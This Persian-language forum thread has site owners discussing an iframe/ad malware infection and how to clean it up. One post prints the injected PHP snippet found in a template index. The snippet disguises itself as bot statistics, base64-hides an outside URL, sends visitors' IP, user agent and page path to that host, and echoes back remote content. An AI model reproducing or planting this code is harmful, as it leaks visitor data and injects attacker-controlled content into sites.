در کدوم قسمت کامندتون باید کد رو قرار بدند ، آیفرم اولی یا دومی ؟
نمایش نسخه قابل چاپ
سلام
متاسقانه سایت منم همین ویروس رو گرفته البته امروز گرفت وقتی آبدیت کردم
همه کد ها رو تست کردن هیچی اضافه نشده
سایت هم Html هستش
من فقط 2 تا فایل رو ادیت کردم ولی الان همه صفخات ایت جوری شده
برای من فقط یه کد تبلیغاتی هستش که به سایت دیگه رو باز میکنه
راهی نداره ؟
واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.
منم همین مشکل رو امشب تو سایتم دیدم اینم آی فرم که درستش کرده بود / این کد رو تو صفحه ایندکس قالب حذف کردم درست شد
اگه نمی تونی درستش کنی پی ام بده خودم واست حلش میکنمکد:<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
دوستانی که iframe رو حذف میکنن و بعدش میگن درست شد توجه کنن همون صفحه بازم تا یکی دو هفته دیگه مجدد iframe میگیره.
من یه راه حل خود دارم:
1 - آنتی emisoft anti malware یا کسپر 2013 اول رو سیستموتون نصب کنید و اسکن کنید و همه تروجانها رو حذف کنید. (emisoft anti malware تخصصش شناسایی و حذف malware و تروجانه)
2 - به سایتتون رفته ویروس iframe رو از سایت حذف کرده و سطح دسترسی فایل های htm , html و java رو 444 بکنید.
دوستان اگه راه سریعتری دارن پیشنهاد بدن.